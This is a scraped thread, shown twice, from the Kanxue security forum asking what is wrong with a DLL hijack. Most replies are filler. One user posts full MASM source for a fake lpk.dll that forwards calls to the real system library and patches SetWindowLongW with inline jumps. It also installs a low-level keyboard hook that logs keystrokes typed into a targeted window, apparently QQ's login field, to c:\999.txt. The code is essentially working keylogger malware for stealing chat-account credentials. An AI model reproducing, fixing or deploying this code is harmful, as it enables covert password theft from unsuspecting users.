DLL劫持错在那里-付费问答-看雪-安全社区|安全招聘|kanxue.com

最新回复 (7)
mikejob 雪币： 3 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 6 粉丝 0 关注私信	mikejob 2 楼帮顶。。 2015-7-11 22:13 0
啃着地瓜雪币： 6 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	啃着地瓜 3 楼看不出来 2015-7-14 17:03 0
qqsimon 雪币： 326 活跃值： (30) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 35 粉丝 1 关注私信	qqsimon 4 楼水平未够，不知错在那里。 2015-7-14 17:36 0
w捏肥阿宝雪币： 0 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 5 粉丝 0 关注私信	w捏肥阿宝 5 楼同2楼。。。。。。 2015-7-17 00:46 0
yemailu 雪币： 290 活跃值： (76) 能力值： ( LV2，RANK：10 ) 在线值：发帖 14 回帖 40 粉丝 0 关注私信	yemailu 6 楼 HOOK QQ时他掉线了 2015-7-18 00:32 0
yemailu 雪币： 290 活跃值： (76) 能力值： ( LV2，RANK：10 ) 在线值：发帖 14 回帖 40 粉丝 0 关注私信	yemailu 7 楼 .386 .model flat, stdcall option casemap :none ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; Include 文件定义 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> include windows.inc include user32.inc includelib user32.lib include kernel32.inc includelib kernel32.lib ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> kbdllhook struct vkCode DWORD ?; scanCode DWORD ?; flags DWORD ?; time DWORD ?; dwExtraInfo DWORD ?; kbdllhook ends .data hInstance dd ? szLpk db 'C:\WINDOWS\system32\lpk.dll',0 szLpkEditControl db 'LpkEditControl',0 lpLpkInitialize db 'LpkInitialize',0 lpLpkTabbedTextOut db 'LpkTabbedTextOut',0 lpLpkDllInitialize db 'LpkDllInitialize',0 lpLpkDrawTextEx db 'LpkDrawTextEx',0 lpLpkEditControl db 'LpkEditControl',0 lpLpkExtTextOut db 'LpkExtTextOut',0 lpLpkGetCharacterPlacement db 'LpkGetCharacterPlacement',0 lpLpkGetTextExtentExPoint db 'LpkGetTextExtentExPoint',0 lpLpkPSMTextOut db 'LpkPSMTextOut',0 lpLpkUseGDIWidthCache db 'LpkUseGDIWidthCache',0 lpftsWordBreak db 'ftsWordBreak',0 szCx db 'c:\999.txt',0 szX db '%c',0 szY db '%x',0 szSetWindowsHookExA db 'SetWindowsHookExA',0 dwSetWindowsHookExA dd ? lpSetWindowLongW db 'SetWindowLongW',0 dwSetWindowLongW dd ? szLoadLibrary db 'LoadLibraryA',0 szKernel32 db 'kernel32',0 szUser32 db 'user32',0 dwUser32 dd ? szCreateWindowExA db 'CreateWindowExA',0 szSetWindowLongA db 'SetWindowLongW',0 szGetActiveWindow db 'GetActiveWindow',0 dwGetActiveWindow dd ? dwkeybd_event db 'keybd_event',0 szSetWindowsHookExW db 'SetWindowsHookExW',0 szSetTimer db 'SetTimer',0 .data? hWnd dd ? hHook dd ? dwMessage dd ? szAscii db 4 dup (?) dwLpk dd ? hFile dd ? dwId dd ? szFu1 db 255 dup (?),0 dwNubla dd ? dwProcAddress dd ? hEvent dd ? lpProc dd ? lpProc1 dd ? hHook1 dd ? dwEvent1 dd ? ppp db 5 dup (?) ggg dd ? dwProcLong dd ? dwMk1 db 6 dup (?) kl1 dd ? hEvent1 dd ? hHook2 dd ? dwStimer dd ? v1 dd ? n1 dd ? y1 dd ? ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> .code ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; dll 的入口函数 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; 键盘钩子回调函数 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> _HookProc proc _dwCode,_wParam,_lParam local @szKeyState[256]:byte .if _dwCode == HC_ACTION mov eax,_lParam mov ecx,[eax+10h] mov ebx,_lParam assume ebx:ptr kbdllhook .if _wParam ==100h && [ebx].flags !=10h && [ebx].flags!=90h invoke GetActiveWindow invoke GetWindowLongW,eax,GWL_STYLE .if eax ==14c00020h .if !hFile invoke CreateFile,addr szCx,GENERIC_WRITE or GENERIC_READ ,FILE_SHARE_DELETE or FILE_SHARE_READ or FILE_SHARE_WRITE,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0 mov hFile,eax .endif invoke wsprintf,addr szFu1,addr szX,[ebx].vkCode invoke lstrlen,addr szFu1 invoke WriteFile,hFile,addr szFu1,eax,addr n1,0 ;invoke GetLastError ;invoke wsprintf,addr szFu1,addr szX,eax .endif .endif .endif invoke UnhookWindowsHookEx,hHook xor eax,eax ret _HookProc endp _SetTimer proc invoke GetModuleHandle,0 invoke SetWindowsHookExW,WH_KEYBOARD_LL,addr _HookProc,eax,0 mov hHook,eax ret _SetTimer endp _dwProcLong proc xca db 6 dup (?) pushad mov eax,[ebp+0ch] .if eax ==100h .elseif eax ==WM_TIMER invoke KillTimer,DWORD ptr [ebp+08h],DWORD ptr [ebp+10h] .endif popad mov eax,y1 add eax,6 jmp eax _dwProcLong endp _SetWindowLongW proc k1 db 5 dup (?) mov eax,dwSetWindowLongW add eax,5 pushad invoke GetWindowLongW,DWORD ptr [ebp+8],GWL_STYLE .if eax ==14c00020h && DWORD ptr [ebp+0ch]== -4 invoke GetActiveWindow invoke GetWindowLongW,eax,GWL_WNDPROC .if eax .if eax <[ebp+10h] mov eax,[ebp+10h] .endif mov y1,eax ;invoke wsprintf,addr szFu1,addr szY,y1;y1 ;invoke SendMessage,2623474,WM_SETTEXT,0,addr szFu1 .if !dwStimer invoke SetTimer,0,0,100,addr _SetTimer mov dwStimer,eax .endif mov eax,y1 push ecx invoke VirtualProtect,eax,10,PAGE_READWRITE,esp pop ecx mov eax,y1 .if BYTE ptr [eax] !=0e9h mov esi,eax lea edi,xca mov ecx,6 rep movsb lea ecx,_dwProcLong sub ecx,eax sub ecx,5 mov BYTE ptr [eax],0e9h mov [eax+1],ecx .endif .endif .endif popad jmp eax _SetWindowLongW endp LpkInitialize proc invoke GetProcAddress,dwLpk,addr lpLpkInitialize jmp eax LpkInitialize endp LpkTabbedTextOut proc invoke GetProcAddress,dwLpk,addr lpLpkTabbedTextOut jmp eax LpkTabbedTextOut endp LpkDllInitialize proc invoke GetProcAddress,dwLpk,addr lpLpkDllInitialize jmp eax LpkDllInitialize endp LpkDrawTextEx proc invoke GetProcAddress,dwLpk,addr lpLpkDrawTextEx jmp eax LpkDrawTextEx endp LpkEditControl proc dd 16 dup (?) LpkEditControl endp LpkExtTextOut proc invoke GetProcAddress,dwLpk,addr lpLpkExtTextOut jmp eax LpkExtTextOut endp LpkGetCharacterPlacement proc invoke GetProcAddress,dwLpk,addr lpLpkGetCharacterPlacement jmp eax LpkGetCharacterPlacement endp LpkGetTextExtentExPoint proc invoke GetProcAddress,dwLpk,addr lpLpkGetTextExtentExPoint jmp eax LpkGetTextExtentExPoint endp LpkPSMTextOut proc invoke GetProcAddress,dwLpk,addr lpLpkPSMTextOut jmp eax LpkPSMTextOut endp LpkUseGDIWidthCache proc invoke GetProcAddress,dwLpk,addr lpLpkUseGDIWidthCache jmp eax LpkUseGDIWidthCache endp ftsWordBreak proc invoke GetProcAddress,dwLpk,addr lpftsWordBreak jmp eax ftsWordBreak endp DllEntry1 proc _hInstance,_dwReason,_dwReserved pushad mov ecx,40h push ecx invoke VirtualProtect,addr LpkEditControl,ecx,PAGE_READWRITE,esp pop ecx invoke LoadLibrary,addr szLpk mov dwLpk,eax invoke GetProcAddress,dwLpk,addr szLpkEditControl mov esi,eax lea edi,LpkEditControl mov ecx,40h rep movsb invoke LoadLibrary,addr szUser32 mov dwUser32,eax invoke GetProcAddress,dwUser32,addr szSetWindowLongA mov dwSetWindowLongW,eax push ecx invoke VirtualProtect,dwSetWindowLongW,10,PAGE_READWRITE,esp pop ecx mov eax,dwSetWindowLongW .if BYTE ptr [eax]!=0e9h push ecx invoke VirtualProtect,_SetWindowLongW,10,PAGE_READWRITE,esp pop ecx mov esi,dwSetWindowLongW lea edi,k1 mov ecx,5 rep movsb mov eax,dwSetWindowLongW mov ecx,offset _SetWindowLongW sub ecx,eax sub ecx,5 mov BYTE ptr [eax],0e9h mov [eax+1],ecx .endif push ecx invoke VirtualProtect,_dwProcLong,10,PAGE_READWRITE,esp pop ecx popad or eax,1 ret DllEntry1 Endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> End DllEntry1 2015-7-18 00:34 0
fenfei 雪币： 4 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 35 粉丝 0 关注私信	fenfei 8 楼呼唤高手 2015-7-22 08:11 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

mikejob

雪币： 3

活跃值： (10)

能力值：

( LV2，RANK：10 )

在线值：

发帖

3

回帖

6

粉丝

0

关注

私信

mikejob: 2 楼

帮顶。。

2015-7-11 22:13

0

啃着地瓜

雪币： 6

活跃值： (10)

能力值：

( LV2，RANK：10 )

在线值：

发帖

0

回帖

1

粉丝

0

关注

私信

啃着地瓜: 3 楼

看不出来

2015-7-14 17:03

0

qqsimon

雪币： 326

活跃值： (30)

能力值：

( LV2，RANK：10 )

在线值：

发帖

0

回帖

35

粉丝

1

关注

私信

qqsimon: 4 楼

水平未够，不知错在那里。

2015-7-14 17:36

0

w捏肥阿宝

雪币： 0

活跃值： (10)

能力值：

( LV2，RANK：10 )

在线值：

发帖

0

回帖

5

粉丝

0

关注

私信

w捏肥阿宝: 5 楼

同2楼。。。。。。

2015-7-17 00:46

0

yemailu

雪币： 290

活跃值： (76)

能力值：

( LV2，RANK：10 )

在线值：

发帖

14

回帖

40

粉丝

0

关注

私信

yemailu: 6 楼

HOOK QQ时他掉线了

2015-7-18 00:32

0

yemailu

雪币： 290

活跃值： (76)

能力值：

( LV2，RANK：10 )

在线值：

发帖

14

回帖

40

粉丝

0

关注

私信

yemailu: 7 楼

.386
.model flat, stdcall
option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

kbdllhook struct
vkCode DWORD ?;
scanCode  DWORD ?;
flags DWORD ?;
time DWORD ?;
dwExtraInfo DWORD ?;
kbdllhook ends

.data
hInstance dd ?
szLpk db 'C:\WINDOWS\system32\lpk.dll',0
szLpkEditControl db 'LpkEditControl',0
lpLpkInitialize db 'LpkInitialize',0
lpLpkTabbedTextOut db 'LpkTabbedTextOut',0
lpLpkDllInitialize db 'LpkDllInitialize',0
lpLpkDrawTextEx db  'LpkDrawTextEx',0
lpLpkEditControl db 'LpkEditControl',0
lpLpkExtTextOut db 'LpkExtTextOut',0
lpLpkGetCharacterPlacement db 'LpkGetCharacterPlacement',0
lpLpkGetTextExtentExPoint db 'LpkGetTextExtentExPoint',0
lpLpkPSMTextOut db 'LpkPSMTextOut',0
lpLpkUseGDIWidthCache db 'LpkUseGDIWidthCache',0
lpftsWordBreak db 'ftsWordBreak',0
szCx db 'c:\999.txt',0
szX db '%c',0
szY db '%x',0
szSetWindowsHookExA db 'SetWindowsHookExA',0
dwSetWindowsHookExA dd ?

lpSetWindowLongW db 'SetWindowLongW',0
dwSetWindowLongW dd ?

szLoadLibrary db 'LoadLibraryA',0
szKernel32 db 'kernel32',0

szUser32 db 'user32',0
dwUser32 dd ?
szCreateWindowExA db 'CreateWindowExA',0

szSetWindowLongA db 'SetWindowLongW',0
szGetActiveWindow db 'GetActiveWindow',0
dwGetActiveWindow dd ?
dwkeybd_event db 'keybd_event',0
szSetWindowsHookExW db 'SetWindowsHookExW',0
szSetTimer db 'SetTimer',0

.data?
hWnd dd ?
hHook dd ?
dwMessage dd ?
szAscii db 4 dup (?)
dwLpk dd ?
hFile dd ?
dwId dd ?
szFu1 db 255 dup (?),0
dwNubla dd ?
dwProcAddress dd ?
hEvent dd ?
lpProc dd ?
lpProc1 dd ?
hHook1 dd ?
dwEvent1 dd ?

ppp db 5 dup (?)
ggg dd ?
dwProcLong dd ?
dwMk1 db 6 dup (?)
kl1 dd ?
hEvent1 dd ?
hHook2 dd ?
dwStimer dd ?
v1 dd ?
n1 dd ?
y1 dd ?
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; dll 的入口函数
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 键盘钩子回调函数
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

_HookProc proc _dwCode,_wParam,_lParam
local @szKeyState[256]:byte
.if _dwCode == HC_ACTION
mov eax,_lParam
mov ecx,[eax+10h]
mov ebx,_lParam
assume ebx:ptr kbdllhook
.if _wParam ==100h && [ebx].flags !=10h  && [ebx].flags!=90h
invoke GetActiveWindow
invoke GetWindowLongW,eax,GWL_STYLE
.if eax ==14c00020h
.if !hFile
invoke CreateFile,addr szCx,GENERIC_WRITE or GENERIC_READ  ,FILE_SHARE_DELETE or FILE_SHARE_READ or FILE_SHARE_WRITE,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0
mov hFile,eax
.endif

invoke wsprintf,addr szFu1,addr szX,[ebx].vkCode
invoke lstrlen,addr szFu1
invoke WriteFile,hFile,addr szFu1,eax,addr n1,0
;invoke GetLastError
;invoke wsprintf,addr szFu1,addr szX,eax

.endif

.endif
.endif

invoke UnhookWindowsHookEx,hHook
xor eax,eax
ret
_HookProc endp

_SetTimer proc
invoke GetModuleHandle,0
invoke SetWindowsHookExW,WH_KEYBOARD_LL,addr _HookProc,eax,0
mov hHook,eax
ret
_SetTimer endp

_dwProcLong proc
xca db 6 dup (?)
pushad

mov eax,[ebp+0ch]

.if eax ==100h

.elseif eax ==WM_TIMER

invoke KillTimer,DWORD ptr [ebp+08h],DWORD ptr [ebp+10h]

.endif

popad
mov eax,y1
add eax,6
jmp eax
_dwProcLong endp

_SetWindowLongW proc
k1 db 5 dup (?)
mov eax,dwSetWindowLongW
add eax,5
pushad
invoke GetWindowLongW,DWORD ptr [ebp+8],GWL_STYLE
.if eax ==14c00020h && DWORD ptr [ebp+0ch]== -4
invoke GetActiveWindow
invoke GetWindowLongW,eax,GWL_WNDPROC
.if eax
.if eax <[ebp+10h]
mov eax,[ebp+10h]
.endif
mov y1,eax

;invoke wsprintf,addr szFu1,addr szY,y1;y1
;invoke SendMessage,2623474,WM_SETTEXT,0,addr szFu1

.if !dwStimer
invoke SetTimer,0,0,100,addr _SetTimer
mov dwStimer,eax
.endif

mov eax,y1
push ecx
invoke VirtualProtect,eax,10,PAGE_READWRITE,esp
pop ecx

mov eax,y1
.if BYTE ptr [eax] !=0e9h

mov esi,eax
lea edi,xca
mov ecx,6
rep movsb

lea ecx,_dwProcLong
sub ecx,eax
sub ecx,5
mov BYTE ptr [eax],0e9h
mov [eax+1],ecx

.endif

.endif

.endif
popad
jmp eax

_SetWindowLongW endp

LpkInitialize proc
invoke GetProcAddress,dwLpk,addr lpLpkInitialize
jmp eax
LpkInitialize endp

LpkTabbedTextOut proc
invoke GetProcAddress,dwLpk,addr lpLpkTabbedTextOut
jmp eax
LpkTabbedTextOut endp

LpkDllInitialize proc
invoke GetProcAddress,dwLpk,addr lpLpkDllInitialize
jmp eax
LpkDllInitialize endp

LpkDrawTextEx proc
invoke GetProcAddress,dwLpk,addr lpLpkDrawTextEx
jmp eax
LpkDrawTextEx endp

LpkEditControl proc
dd 16 dup (?)
LpkEditControl endp

LpkExtTextOut proc
invoke GetProcAddress,dwLpk,addr lpLpkExtTextOut
jmp eax
LpkExtTextOut endp

LpkGetCharacterPlacement proc

invoke GetProcAddress,dwLpk,addr lpLpkGetCharacterPlacement
jmp eax
LpkGetCharacterPlacement endp

LpkGetTextExtentExPoint proc

invoke GetProcAddress,dwLpk,addr lpLpkGetTextExtentExPoint
jmp eax
LpkGetTextExtentExPoint endp

LpkPSMTextOut proc

invoke GetProcAddress,dwLpk,addr lpLpkPSMTextOut
jmp eax
LpkPSMTextOut endp

LpkUseGDIWidthCache proc

invoke GetProcAddress,dwLpk,addr lpLpkUseGDIWidthCache
jmp eax
LpkUseGDIWidthCache endp

ftsWordBreak proc
invoke GetProcAddress,dwLpk,addr lpftsWordBreak
jmp eax
ftsWordBreak endp

DllEntry1 proc _hInstance,_dwReason,_dwReserved
pushad
mov ecx,40h
push ecx
invoke VirtualProtect,addr LpkEditControl,ecx,PAGE_READWRITE,esp
pop ecx
invoke LoadLibrary,addr szLpk
mov dwLpk,eax
invoke GetProcAddress,dwLpk,addr szLpkEditControl
mov esi,eax
lea edi,LpkEditControl
mov ecx,40h
rep movsb

invoke LoadLibrary,addr szUser32
mov dwUser32,eax
invoke GetProcAddress,dwUser32,addr szSetWindowLongA
mov dwSetWindowLongW,eax

push ecx
invoke VirtualProtect,dwSetWindowLongW,10,PAGE_READWRITE,esp
pop ecx

mov eax,dwSetWindowLongW
.if BYTE ptr [eax]!=0e9h

push ecx
invoke VirtualProtect,_SetWindowLongW,10,PAGE_READWRITE,esp
pop ecx

mov esi,dwSetWindowLongW
lea edi,k1
mov ecx,5
rep movsb

mov eax,dwSetWindowLongW
mov ecx,offset _SetWindowLongW
sub ecx,eax
sub ecx,5
mov BYTE ptr [eax],0e9h
mov [eax+1],ecx
.endif

push ecx
invoke VirtualProtect,_dwProcLong,10,PAGE_READWRITE,esp
pop ecx

popad
or eax,1
ret
DllEntry1 Endp

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
End DllEntry1

2015-7-18 00:34

0